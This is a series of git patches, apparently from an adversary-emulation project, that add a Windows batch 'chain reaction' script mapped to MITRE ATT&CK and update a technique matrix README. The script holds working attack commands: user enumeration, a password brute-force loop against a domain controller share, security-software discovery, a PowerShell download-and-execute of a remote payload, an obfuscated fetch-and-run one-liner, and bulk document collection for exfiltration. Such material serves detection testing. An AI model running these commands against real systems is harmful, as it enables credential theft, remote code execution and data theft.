From 1cf1cdd27970f2943adf3060264b040874ed4261 Mon Sep 17 00:00:00 2001 From: Michael Haag <“mike@redcanary.com git config --global user.name “Michael Haag> Date: Tue, 16 Jan 2018 08:59:22 -0700 Subject: [PATCH 1/3] Reactor Chain Reaction Chain Reaction - Reactor --- .../chain_reaction_Reactor.bat | 54 +++++++++++++++++++ .../Discovery/System_Owner-User_Discovery.md | 8 +++ 2 files changed, 62 insertions(+) create mode 100644 ARTifacts/Chain_Reactions/chain_reaction_Reactor.bat diff --git a/ARTifacts/Chain_Reactions/chain_reaction_Reactor.bat b/ARTifacts/Chain_Reactions/chain_reaction_Reactor.bat new file mode 100644 index 00000000..602e36be --- /dev/null +++ b/ARTifacts/Chain_Reactions/chain_reaction_Reactor.bat @@ -0,0 +1,54 @@ +:: Chain Reaction - Reactor +:: +:: + +:: Tactic: Discovery +:: Technique: System Owner/User Discovery: https://attack.mitre.org/wiki/Technique/T1033 + +:: Single Endpoint + +:: for /F “tokens=1,2” %i in (‘qwinsta /server: ^| findstr “Active Disc”‘) do @echo %i | find /v “#” | find /v “console” || echo %j > usernames.txt + +:: Multiple Endpoints + +@FOR /F %n in (computers.txt) DO @FOR /F “tokens=1,2” %i in (‘qwinsta /server:%n ^| findstr “Active Disc”’) do @echo %i | find /v “#” | find /v “console” || echo %j > usernames.txt + + +:: Tactic: Credential Access, Lateral Movement +:: Technique: Brute Force: https://attack.mitre.org/wiki/Technique/T1110 +:: Technique: Windows Admin Shares: https://attack.mitre.org/wiki/Technique/T1077 + +@FOR /F %n in (usernames.txt) DO @FOR /F %p in (passwords.txt) DO @net use \\COMPANYDC1\IPC$ /user:COMPANY\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\COMPANYDC1\IPC$ > NUL + + +:: Tactic: Discovery +:: Technique: Security Software Discovery: https://attack.mitre.org/wiki/Technique/T1063 + +netsh.exe advfirewall firewall show all profiles + +tasklist.exe | findstr cb + +tasklist.exe | findstr virus + +tasklist.exe | findstr defender + +:: Tactic: Execution, Discovery +:: Technique: PowerShell: https://attack.mitre.org/wiki/Technique/T1086 +:: Technique: Multiple Discovery + +powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat')" + +:: Tactic: Execution +:: Technique: Powershell: https://attack.mitre.org/wiki/Technique/T1086 + +:: cmd /c "set apple=fish (cars help://bit.ly/L3g1t).content&&cmd /c set boat=%apple:fish=iex% ^&^&cmd /c set ab=%boat:cars=iwr% ^^^&^^^&cmd /c echo %ab:el=tt%|%ProgramData:~3,1%%ProgramData:~5,1%we%ProgramData:~7,1%she%Public:~12,1%%Public:~12,1% -" + +:: Tactic: Collection +:: Technique: Automated Collection: https://attack.mitre.org/wiki/Technique/T1119 + +for /R c: %f in (*.docx) do copy %f c:\temp\ + +:: Tactic: Exfiltration +:: Technique: Data Compressed: https://attack.mitre.org/wiki/Technique/T1002 + +powershell.exe dir c:\temp -Recurse | Compress-Archive -DestinationPath C:\temp\allthedataz.zip diff --git a/Windows/Discovery/System_Owner-User_Discovery.md b/Windows/Discovery/System_Owner-User_Discovery.md index 98f4110f..f8c6557e 100644 --- a/Windows/Discovery/System_Owner-User_Discovery.md +++ b/Windows/Discovery/System_Owner-User_Discovery.md @@ -29,3 +29,11 @@ Remote: Local: qwinsta.exe + +Single Endpoint + + for /F “tokens=1,2” %i in (‘qwinsta /server: ^| findstr “Active Disc”‘) do @echo %i | find /v “#” | find /v “console” || echo %j > usernames.txt + +Multiple Endpoints + + @FOR /F %n in (computers.txt) DO @FOR /F “tokens=1,2” %i in (‘qwinsta /server:%n ^| findstr “Active Disc”’) do @echo %i | find /v “#” | find /v “console” || echo %j > usernames.txt From 382d6313a3ffb14fdf46801a7b6e4159a420dd8b Mon Sep 17 00:00:00 2001 From: Michael Haag <“mike@redcanary.com git config --global user.name “Michael Haag> Date: Tue, 16 Jan 2018 10:10:52 -0700 Subject: [PATCH 2/3] Windows Matrix Update Windows Matrix update + also fixed Dir names/paths --- ...ntial Dumping.md => Credential_Dumping.md} | 0 ...Deobfuscate_Decode_Files_Or_Information.md | 0 .../File_Deletion.md | 0 .../Indicator_Removal_on_Host.md | 0 .../Timestomp.md | 0 .../Windows_Admin_Shares.md} | 0 .../Windows_Remote_Management.md} | 0 ...Service_Installation.md => New_Service.md} | 0 .../Bypass_User_Account_Control.md | 0 .../Process_Injection.md} | 0 Windows/README.md | 80 ++++++++++--------- 11 files changed, 42 insertions(+), 38 deletions(-) rename Windows/Credential_Access/{Credential Dumping.md => Credential_Dumping.md} (100%) rename Windows/{Defense Evasion => Defense_Evasion}/Deobfuscate_Decode_Files_Or_Information.md (100%) rename Windows/{Defense Evasion => Defense_Evasion}/File_Deletion.md (100%) rename Windows/{Defense Evasion => Defense_Evasion}/Indicator_Removal_on_Host.md (100%) rename Windows/{Defense Evasion => Defense_Evasion}/Timestomp.md (100%) rename Windows/{Lateral Movement/Windows Admin Shares.md => Lateral_Movement/Windows_Admin_Shares.md} (100%) rename Windows/{Lateral Movement/Windows Remote Management.md => Lateral_Movement/Windows_Remote_Management.md} (100%) rename Windows/Persistence/{Service_Installation.md => New_Service.md} (100%) rename Windows/{Privilege Escalation => Privilege_Escalation}/Bypass_User_Account_Control.md (100%) rename Windows/{Privilege Escalation/DLL Injection.md => Privilege_Escalation/Process_Injection.md} (100%) diff --git a/Windows/Credential_Access/Credential Dumping.md b/Windows/Credential_Access/Credential_Dumping.md similarity index 100% rename from Windows/Credential_Access/Credential Dumping.md rename to Windows/Credential_Access/Credential_Dumping.md diff --git a/Windows/Defense Evasion/Deobfuscate_Decode_Files_Or_Information.md b/Windows/Defense_Evasion/Deobfuscate_Decode_Files_Or_Information.md similarity index 100% rename from Windows/Defense Evasion/Deobfuscate_Decode_Files_Or_Information.md rename to Windows/Defense_Evasion/Deobfuscate_Decode_Files_Or_Information.md diff --git a/Windows/Defense Evasion/File_Deletion.md b/Windows/Defense_Evasion/File_Deletion.md similarity index 100% rename from Windows/Defense Evasion/File_Deletion.md rename to Windows/Defense_Evasion/File_Deletion.md diff --git a/Windows/Defense Evasion/Indicator_Removal_on_Host.md b/Windows/Defense_Evasion/Indicator_Removal_on_Host.md similarity index 100% rename from Windows/Defense Evasion/Indicator_Removal_on_Host.md rename to Windows/Defense_Evasion/Indicator_Removal_on_Host.md diff --git a/Windows/Defense Evasion/Timestomp.md b/Windows/Defense_Evasion/Timestomp.md similarity index 100% rename from Windows/Defense Evasion/Timestomp.md rename to Windows/Defense_Evasion/Timestomp.md diff --git a/Windows/Lateral Movement/Windows Admin Shares.md b/Windows/Lateral_Movement/Windows_Admin_Shares.md similarity index 100% rename from Windows/Lateral Movement/Windows Admin Shares.md rename to Windows/Lateral_Movement/Windows_Admin_Shares.md diff --git a/Windows/Lateral Movement/Windows Remote Management.md b/Windows/Lateral_Movement/Windows_Remote_Management.md similarity index 100% rename from Windows/Lateral Movement/Windows Remote Management.md rename to Windows/Lateral_Movement/Windows_Remote_Management.md diff --git a/Windows/Persistence/Service_Installation.md b/Windows/Persistence/New_Service.md similarity index 100% rename from Windows/Persistence/Service_Installation.md rename to Windows/Persistence/New_Service.md diff --git a/Windows/Privilege Escalation/Bypass_User_Account_Control.md b/Windows/Privilege_Escalation/Bypass_User_Account_Control.md similarity index 100% rename from Windows/Privilege Escalation/Bypass_User_Account_Control.md rename to Windows/Privilege_Escalation/Bypass_User_Account_Control.md diff --git a/Windows/Privilege Escalation/DLL Injection.md b/Windows/Privilege_Escalation/Process_Injection.md similarity index 100% rename from Windows/Privilege Escalation/DLL Injection.md rename to Windows/Privilege_Escalation/Process_Injection.md diff --git a/Windows/README.md b/Windows/README.md index 3cf59f94..9c65c158 100644 --- a/Windows/README.md +++ b/Windows/README.md @@ -1,40 +1,44 @@ ## MITRE ATT&CK Matrix - Windows -| Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control | -|-------------------------------------------------------|---------------------------------------|-----------------------------------------|----------------------------------------|----------------------------------------|-------------------------------------|------------------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------| -| [Accessibility Features](Persistence/Accessibility_Features.md) | Access Token Manipulation | Access Token Manipulation | [Account Manipulation](Credential_Access/Account_Manipulation.md) | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | [Application Shimming](Persistence/Application_Shimming.md) | [Audio Capture](Collection/Audio_Capture.md) | Automated Exfiltration | Commonly Used Port | -| [AppInit DLLs](Persistence/AppInit_DLLs.md) | [Accessibility Features](Persistence/Accessibility_Features.md) | Binary Padding | [Brute Force](Credential_Access/Brute_Force.md) | Application Window Discovery | Exploitation of Vulnerability | Command-Line Interface | [Automated Collection](Collection/Automated_Collection.md) | [Data Compressed](Exfiltration/Data_Compressed.md) | Communication Through Removable Media | -| [Application Shimming](Persistence/Application_Shimming.md) | [AppInit DLLs](Persistence/AppInit_DLLs.md) | Bypass User Account Control | [Create Account](Credential_Access/Create_Account.md) | File and Directory Discovery | Logon Scripts | Execution through API | [Clipboard Data](Collection/Clipboard_Data.md) | Data Encrypted | Connection Proxy | -| Authentication Package | [Application Shimming](Persistence/Application_Shimming.md) | Code Signing | [Credential Dumping](Credential_Access/Credential%20Dumping.md) | Network Service Scanning | Pass the Hash | Execution through Module Load | Data Staged | Data Transfer Size Limits | Custom Command and Control Protocol | -| Bootkit | Bypass User Account Control | Component Firmware | [Credentials in Files](Credential_Access/Credentials_in_Files.md) | Network Share Discovery | Pass the Ticket | Graphical User Interface | Data from Local System | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol | -| [Change Default File Association](Persistence/Change_Default_File_Association.md) | [DLL Injection](Privilege%20Escalation/DLL%20Injection.md) | [Component Object Model Hijacking](Persistence/Component_Object_Model_Hijacking.md) | Exploitation of Vulnerability | Peripheral Device Discovery | Remote Desktop Protocol | [InstallUtil](Execution/InstallUtil.md) | Data from Network Shared Drive | Exfiltration Over Command and Control Channel | Data Encoding | -| Component Firmware | DLL Search Order Hijacking | [DLL Injection](Privilege%20Escalation/DLL%20Injection.md) | [Input Capture](Collection/Input_Capture.md) | Permission Groups Discovery | Remote File Copy | [PowerShell](Execution/PowerShell.md) | Data from Removable Media | Exfiltration Over Other Network Medium | Data Obfuscation | -| Component Object Model Hijacking | Exploitation of Vulnerability | DLL Search Order Hijacking | Network Sniffing | Process Discovery | Remote Services | Process Hollowing | Email Collection | Exfiltration Over Physical Medium | Fallback Channels | -| DLL Search Order Hijacking | File System Permissions Weakness | DLL Side-Loading | Private Keys | [Query Registry](Discovery/Query_Registry.md) | Replication Through Removable Media | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md) | Input Capture | Scheduled Transfer | Multi-Stage Channels | -| External Remote Services | Local Port Monitor | [Deobfuscate - Decode Files or Information](Defense%20Evasion/Deobfuscate_Decode_Files_Or_Information.md) | Two-Factor Authentication Interception | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | Shared Webroot | [Regsvr32](Execution/Regsvr32.md) | Screen Capture | | Multiband Communication | -| File System Permissions Weakness | [New Service](Persistence/Service_Installation.md) | Disabling Security Tools | | [Security Software Discovery](Discovery/Security_Software_Discovery.md) | Taint Shared Content | Rundll32 | Video Capture | | Multilayer Encryption | -| Hidden Files and Directories | Path Interception | Exploitation of Vulnerability | | [System Information Discovery](Discovery/System_Information_Discovery.md) | Third-party Software | [Scheduled Task](Persistence/Scheduled_Task.md) | | | Remote File Copy | -| Hypervisor | [Scheduled Task](Persistence/Scheduled_Task.md) | [File Deletion](Defense%20Evasion/File_Deletion.md) | | [System Network Configuration Discovery](Discovery/System_Network_Configuration_Discovery.md) | [Windows Admin Shares](Lateral%20Movement/Windows%20Admin%20Shares.md) | Scripting | | | Standard Application Layer Protocol | -| Local Port Monitor | Service Registry Permissions Weakness | File System Logical Offsets | | System Network Connections Discovery | Windows Remote Management | Service Execution | | | Standard Cryptographic Protocol | -| Logon Scripts | Valid Accounts | Hidden Files and Directories | | [System Owner/User Discovery](Discovery/System_Owner-User_Discovery.md) | | Third-party Software | | | Standard Non-Application Layer Protocol | -| Modify Existing Service | Web Shell | Indicator Blocking | | [System Service Discovery](Discovery/System_Service_Discovery.md) | | Trusted Developer Utilities | | | Uncommonly Used Port | -| [Netsh Helper DLL](Persistence/Netsh_Helper_DLL.md) | | Indicator Removal from Tools | | [System Time Discovery](Discovery/System_Time_Discovery.md) | | [Windows Management Instrumentation](Execution/Windows_Management_Instrumentation.md) | | | Web Service | -| New Service | | [Indicator Removal on Host](Defense%20Evasion/Indicator_Removal_on_Host.md) | | | | [Windows Remote Management](Lateral%20Movement/Windows%20Remote%20Management.md) | | | | -| [Office Application Startup](Persistence/Office_Application_Startup.md) | | Install Root Certificate | | | | [Bitsadmin](Execution/Bitsadmin.md) | | | | -| Path Interception | | [InstallUtil](Execution/InstallUtil.md) | | | | | | | | -| Redundant Access | | Masquerading | | | | | | | | -| [Registry Run Keys / Start Folder](Persistence/Registry_Run_Keys_Start_folder.md) | | Modify Registry | | | | | | | | -| Scheduled Task | | NTFS Extended Attributes | | | | | | | | -| Security Support Provider | | Network Share Connection Removal | | | | | | | | -| Service Registry Permissions Weakness | | Obfuscated Files or Information | | | | | | | | -| Shortcut Modification | | Process Hollowing | | | | | | | | -| System Firmware | | Redundant Access | | | | | | | | -| Valid Accounts | | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md) | | | | | | | | -| Web Shell | | [Regsvr32](Execution/Regsvr32.md) | | | | | | | | -| [Windows Management Instrumentation Event Subscription](Persistence/Windows_Management_Instrumentation_Event_Subscription.md) | | Rootkit | | | | | | | | -| Winlogon Helper DLL | | [Rundll32](Execution/Rundll32.md) | | | | | | | | -| | | Scripting | | | | | | | | -| | | Software Packing | | | | | | | | -| | | [Timestomp](Defense%20Evasion/Timestomp.md) | | | | | | | | -| | | [Trusted Developer Utilities](Execution/Trusted_Developer_Utilities.md) | | | | | | | | -| | | Valid Accounts | | | | | | | | +| Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control | +|-------------------------------------------------------|----------------------------------------|-----------------------------------------|----------------------------------------|----------------------------------------|-------------------------------------|------------------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------| +| [Accessibility Features](Persistence/Accessibility_Features.md) | Access Token Manipulation | Access Token Manipulation | [Account Manipulation](Credential_Access/Account_Manipulation.md) | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | Command-Line Interface | [Audio Capture](Collection/Audio_Capture.md) | Automated Exfiltration | Commonly Used Port | +| AppCert DLLs | Accessibility Features | Binary Padding | [Brute Force](Credential_Access/Brute_Force.md) | Application Window Discovery | Distributed Component Object Model | Dynamic Data Exchange | [Automated Collection](Collection/Automated_Collection.md) | [Data Compressed](Exfiltration/Data_Compressed.md) | Communication Through Removable Media | +| [AppInit DLLs](Persistence/AppInit_DLLs.md) | AppCert DLLs | Bypass User Account Control | [Credential Dumping](Credential_Access/Credential_Dumping.md) | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Execution through API | Browser Extensions | Data Encrypted | Connection Proxy | +| [Application Shimming](Persistence/Application_Shimming.md) | AppInit DLLs | Code Signing | [Credentials in Files](Credential_Access/Credentials_in_Files.md) | Network Service Scanning | Logon Scripts | Execution through Module Load | [Clipboard Data](Collection/Clipboard_Data.md) | Data Transfer Size Limits | Custom Command and Control Protocol | +| [Authentication Package](Persistence/Authentication_Package.md) | Application Shimming | Component Firmware | Exploitation of Vulnerability | Network Share Discovery | Pass the Hash | Graphical User Interface | Data Staged | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol | +| Bootkit | [Bypass User Account Control](Privilege_Escalation/Bypass_User_Account_Control.md) | Component Object Model Hijacking | Forced Authentication | Peripheral Device Discovery | Pass the Ticket | [InstallUtil](Execution/InstallUtil.md) | Data from Local System | Exfiltration Over Command and Control Channel | Data Encoding | +| Browser Extensions | DLL Search Order Hijacking | DLL Search Order Hijacking | Hooking | Permission Groups Discovery | Remote Desktop Protocol | LSASS Driver | Data from Network Shared Drive | Exfiltration Over Other Network Medium | Data Obfuscation | +| [Change Default File Association](Persistence/Change_Default_File_Association.md) | Exploitation of Vulnerability | DLL Side-Loading | [Input Capture](Collection/Input_Capture.md) | Process Discovery | Remote File Copy | Mshta | Data from Removable Media | Exfiltration Over Physical Medium | Domain Fronting | +| Component Firmware | Extra Window Memory Injection | [Deobfuscate/Decode Files or Information](Defense_Evasion/Deobfuscate_Decode_Files_Or_Information.md) | LLMNR/NBT-NS Poisoning | [Query Registry](Discovery/Query_Registry.md) | Remote Services | [PowerShell](Execution/PowerShell.md) | Email Collection | Scheduled Transfer | Fallback Channels | +| [Component Object Model Hijacking](Persistence/Component_Object_Model_Hijacking.md) | File System Permissions Weakness | Disabling Security Tools | Network Sniffing | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | Replication Through Removable Media | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md) | Input Capture | | Multi-Stage Channels | +| [Create Account](Credential_Access/Create_Account.md) | Hooking | Exploitation of Vulnerability | Password Filter DLL | [Security Software Discovery](Discovery/Security_Software_Discovery.md) | Shared Webroot | [Regsvr32](Execution/Regsvr32.md) | Man in the Browser | | Multi-hop Proxy | +| DLL Search Order Hijacking | Image File Execution Options Injection | Extra Window Memory Injection | Private Keys | [System Information Discovery](Discovery/System_Information_Discovery.md) | Taint Shared Content | [Rundll32](Execution/rundll32.md) | Screen Capture | | Multiband Communication | +| External Remote Services | [New Service](Persistence/New_Service.md) | [File Deletion](Defense_Evasion/File_Deletion.md) | Replication Through Removable Media | [System Network Configuration Discovery](Discovery/System_Network_Configuration_Discovery.md) | Third-party Software | Scheduled Task | Video Capture | | Multilayer Encryption | +| File System Permissions Weakness | Path Interception | File System Logical Offsets | Two-Factor Authentication Interception | System Network Connections Discovery | [Windows Admin Shares](Lateral_Movement/Windows_Admin_Shares.md) | Scripting | | | Remote File Copy | +| Hidden Files and Directories | Port Monitors | Hidden Files and Directories | | [System Owner/User Discovery](Discovery/System_Owner-User_Discovery.md) | [Windows Remote Management](Lateral_Movement/Windows_Remote_Management.md) | Service Execution | | | Standard Application Layer Protocol | +| Hooking | Process Injection](Privilege_Escalation/Process_Injection.md) | Image File Execution Options Injection | | [System Service Discovery](Discovery/System_Service_Discovery.md) | | Third-party Software | | | Standard Cryptographic Protocol | +| Hypervisor | SID-History Injection | Indicator Blocking | | [System Time Discovery](Discovery/System_Time_Discovery.md) | | [Trusted Developer Utilities](Execution/Trusted_Developer_Utilities.md) | | | Standard Non-Application Layer Protocol | +| Image File Execution Options Injection | [Scheduled Task](Persistence/Scheduled_Task.md) | Indicator Removal from Tools | | | | [Windows Management Instrumentation](Execution/Windows_Management_Instrumentation.md) | | | Uncommonly Used Port | +| LSASS Driver | Service Registry Permissions Weakness | [Indicator Removal on Host](Defense_Evasion/Indicator_Removal_on_Host.md) | | | | Windows Remote Management | | | Web Service | +| Logon Scripts | Valid Accounts | Install Root Certificate | | | | | | | | +| Modify Existing Service | Web Shell | InstallUtil | | | | | | | | +| [Netsh Helper DLL](Persistence/Netsh_Helper_DLL.md) | | Masquerading | | | | | | | | +| [New Service](Persistence/New_Service.md) | | Modify Registry | | | | | | | | +| [Office Application Startup](Persistence/Office_Application_Startup.md) | | Mshta | | | | | | | | +| Path Interception | | NTFS Extended Attributes | | | | | | | | +| Port Monitors | | Network Share Connection Removal | | | | | | | | +| Redundant Access | | Obfuscated Files or Information | | | | | | | | +| [Registry Run Keys / Start Folder](Persistence/Registry_Run_Keys_Start_folder.md) | | Process Doppelgänging | | | | | | | | +| [Scheduled Task](Persistence/Scheduled_Task.md) | | Process Hollowing | | | | | | | | +| Screensaver | | [Process Injection](Privilege_Escalation/Process_Injection.md) | | | | | | | | +| Security Support Provider | | Redundant Access | | | | | | | | +| Service Registry Permissions Weakness | | Regsvcs/Regasm | | | | | | | | +| Shortcut Modification | | Regsvr32 | | | | | | | | +| System Firmware | | Rootkit | | | | | | | | +| Valid Accounts | | Rundll32 | | | | | | | | +| Web Shell | | Scripting | | | | | | | | +| [Windows Management Instrumentation Event Subscription](Persistence/Windows_Management_Instrumentation_Event_Subscription.md) | | Software Packing | | | | | | | | +| Winlogon Helper DLL | | [Timestomp](Defense_Evasion/Timestomp.md) | | | | | | | | +| | | Trusted Developer Utilities | | | | | | | | +| | | Valid Accounts | | | | | | | | From a5d7e40120470a0671c14e0a9571857d7e4cc8ad Mon Sep 17 00:00:00 2001 From: Michael Haag <“mike@redcanary.com git config --global user.name “Michael Haag> Date: Tue, 16 Jan 2018 10:22:36 -0700 Subject: [PATCH 3/3] Mshta Add --- Windows/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Windows/README.md b/Windows/README.md index 9c65c158..590e0eb0 100644 --- a/Windows/README.md +++ b/Windows/README.md @@ -9,7 +9,7 @@ | [Authentication Package](Persistence/Authentication_Package.md) | Application Shimming | Component Firmware | Exploitation of Vulnerability | Network Share Discovery | Pass the Hash | Graphical User Interface | Data Staged | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol | | Bootkit | [Bypass User Account Control](Privilege_Escalation/Bypass_User_Account_Control.md) | Component Object Model Hijacking | Forced Authentication | Peripheral Device Discovery | Pass the Ticket | [InstallUtil](Execution/InstallUtil.md) | Data from Local System | Exfiltration Over Command and Control Channel | Data Encoding | | Browser Extensions | DLL Search Order Hijacking | DLL Search Order Hijacking | Hooking | Permission Groups Discovery | Remote Desktop Protocol | LSASS Driver | Data from Network Shared Drive | Exfiltration Over Other Network Medium | Data Obfuscation | -| [Change Default File Association](Persistence/Change_Default_File_Association.md) | Exploitation of Vulnerability | DLL Side-Loading | [Input Capture](Collection/Input_Capture.md) | Process Discovery | Remote File Copy | Mshta | Data from Removable Media | Exfiltration Over Physical Medium | Domain Fronting | +| [Change Default File Association](Persistence/Change_Default_File_Association.md) | Exploitation of Vulnerability | DLL Side-Loading | [Input Capture](Collection/Input_Capture.md) | Process Discovery | Remote File Copy | [Mshta](Execution/Mshta.md) | Data from Removable Media | Exfiltration Over Physical Medium | Domain Fronting | | Component Firmware | Extra Window Memory Injection | [Deobfuscate/Decode Files or Information](Defense_Evasion/Deobfuscate_Decode_Files_Or_Information.md) | LLMNR/NBT-NS Poisoning | [Query Registry](Discovery/Query_Registry.md) | Remote Services | [PowerShell](Execution/PowerShell.md) | Email Collection | Scheduled Transfer | Fallback Channels | | [Component Object Model Hijacking](Persistence/Component_Object_Model_Hijacking.md) | File System Permissions Weakness | Disabling Security Tools | Network Sniffing | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | Replication Through Removable Media | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md) | Input Capture | | Multi-Stage Channels | | [Create Account](Credential_Access/Create_Account.md) | Hooking | Exploitation of Vulnerability | Password Filter DLL | [Security Software Discovery](Discovery/Security_Software_Discovery.md) | Shared Webroot | [Regsvr32](Execution/Regsvr32.md) | Man in the Browser | | Multi-hop Proxy | @@ -25,7 +25,7 @@ | Modify Existing Service | Web Shell | InstallUtil | | | | | | | | | [Netsh Helper DLL](Persistence/Netsh_Helper_DLL.md) | | Masquerading | | | | | | | | | [New Service](Persistence/New_Service.md) | | Modify Registry | | | | | | | | -| [Office Application Startup](Persistence/Office_Application_Startup.md) | | Mshta | | | | | | | | +| [Office Application Startup](Persistence/Office_Application_Startup.md) | | [Mshta](Execution/Mshta.md) | | | | | | | | | Path Interception | | NTFS Extended Attributes | | | | | | | | | Port Monitors | | Network Share Connection Removal | | | | | | | | | Redundant Access | | Obfuscated Files or Information | | | | | | | |